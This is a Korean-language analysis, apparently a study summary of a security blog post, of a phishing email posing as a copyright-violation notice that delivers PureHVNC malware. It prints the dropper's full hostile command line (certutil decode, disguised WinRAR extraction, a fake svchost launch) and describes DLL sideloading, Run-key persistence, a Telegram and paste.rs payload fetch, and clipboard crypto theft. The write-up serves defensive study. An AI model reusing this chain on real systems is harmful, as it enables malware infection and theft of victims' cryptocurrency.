1주차 기술 [저작권 위반 안내 메일로 위장한 PureHVNC 악성코드 유포 사례]

원문 : https://blog.plainbit.co.kr/sanae-yuib-seupieopising-meil-bunseog/

6월 13일 ‘웹사이트에 게시된 콘텐츠와 관련된 공식 안내문’ 이라는 제목의 메일이 수신되었다. 저작권 위반 내용 통지로 위장한 악성코드 메일이었다!

메일헤더를 보면 사용된 메일도 Gmail 이고, Gmail서비스를 이용했기 때문에 메일 인증 프로토콜 결과도 모두 pass 로 나타난다. 또한 메일 발송 서버 정보를 나타내는 Recieved 헤더에도 Google 메일 서버가 기록되어있다.

메일본문으로 넘어가서 보면, HMP Law 를 사칭한 웹사이트내 저작권 위반 통지 내용을 담고있다. ‘관련 기사 목록 및 세부 자료(PDF파일)’같은 문구로 클릭 유도를 하는 전형적인 스피어 피싱 공격 기법이다.

유도된 링크를 눌러 압축파일 (‘관련 기사 목록 및 세부 자료(PDF파일)’)을 다운로드해서 압축해제를 거치면 아래와 같은 파일이 나오고,

악성파일 실행흐름은 아래와 같다고 나와있다.

위반게시물자료, dll파일 _폴더파일 순으로 살펴보겠다.

위반_게시물_목록_상세_자료.exe
위 파일은 PDF와 비슷한 문서 아이콘을 가지고 있지만, 제목에서도 보이다시피 실행파일의 형태를 지니고 있다. 이

version.dll
파일을 실행시키면 동일 경로에 있는 veraion.dll 파일을 로드한다. 동일경로의 version.dll 은 proxy DLL로, 우선 로드된 후에 진짜 versio.dll 을 로드시켜 함수들을 중계한다.

_파일
_폴더안에 있는 Evidence Report.docx는 악성 dll 실행중불러오는 파일로, 암호화된 페이로드를 가지고 있다. 페이로드는 다음과 같다.

cmd /c cd _ && start Document.pdf && certutil -decode Document.pdf Invoice.pdf && images.png x -ibck -y Invoice.pdf C:\\\\Users\\\\Public && start C:\\\\Users\\\\Public\\\\Windows\\\\svchost.exe C:\\\\Users\\\\Public\\\\Windows\\\\Lib\\\\images.png ADN_NEW_VER_BOT && exit && exit

암호화된 페이로드 복호화 - certutil -decode Document.pdf Invoice.pdf 명령을 통해, 암호화된 Document.pdf 파일을 Invoice.pdf로 복호화한다. 이는 Windows 기본 도구인 certutil을 이용한 것으로, 외부 도구 없이도 암호화를 해제할 수 있도록 구성되어 있다.

악성 페이로드 압축 해제 - images.png x -ibck -y Invoice.pdf C:\\Users\\Public 명령을 통해, 복호화된 Invoice.pdf 파일을 images.png라는 실행 파일을 사용하여 지정된 경로(C:\\Users\\Public)에 압축 해제한다. 해당 images.png는 실제 압축 해제 기능을 수행하는 WinRAR이며, 확장자만 .png 로 변경되어 있다.

2단계 악성코드 실행 - 마지막으로 start C:\\Users\\Public\\Windows\\svchost.exe C:\\Users\\Public\\Windows\\Lib\\images.png ADN_NEW_VER_BOT 명령을 통해, 2단계 악성코드가 실행된다.

압축 해제 이후 생성된 C:\Users\Public\Windows에는 아래와 같은 실행 파일 및 라이브러리 파일들이 포함되어 있다. 특히, 해당 경로에 존재하는 svchost.exe는 Windows 시스템 파일과 동일하게 위자왼 Python 런타임 실행 파일(pythonw.exe)이다.

디렉터리에는 python310.dll, vcruntime140.dll 등 Python 실행에 필요한 필수 구성 요소가 함께 포함되어 있어, 외부 의존성 없이 독립적으로 악성 스크립트를 구동할 수 있는 환경이 갖추어져 있는 상태이다.

images.png 파일은 Python 스크립트를 포함하고 있으며, 암호화된 형태의 코드를 복호화한 뒤 marshal.loads()를 통해 컴파일된 파이썬 바이트코드(.pyc)를 로딩하고, exec() 함수를 통해 실행하는 구조를 가진다.

악성파일의 지속을 위해 컴퓨터가 부팅될 때마다 실행될 수 있도록 HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 경로에 키 값 Windows Update Service 를 등록한다.

또한 텔레그램 주소 t.me/ADN_NEW_VER_BOT에 접근하여, 추가 페이로드 다운로드에 필요한 값(bAfkY)을 파싱한다.이후 paste.rs의 https://paste.rs/bAfkY로부터 bAfkY.py 를 다운한다. 이 파일은 다음과 같은 분석이 가능하다.

추가 악성코드 실행을 위해 클립보드 모니터링을 통해 암호화폐 지갑 주소를 탈취하는 ClipBanker 계열의 악성코드인 ClipBanker(7S7TJ.py)와 Process Hollowing 기법을 활용하여 악성 페이로드를 실행하는 PureHVNC(8gPe.py) 스크립트를 사용하기도 했다.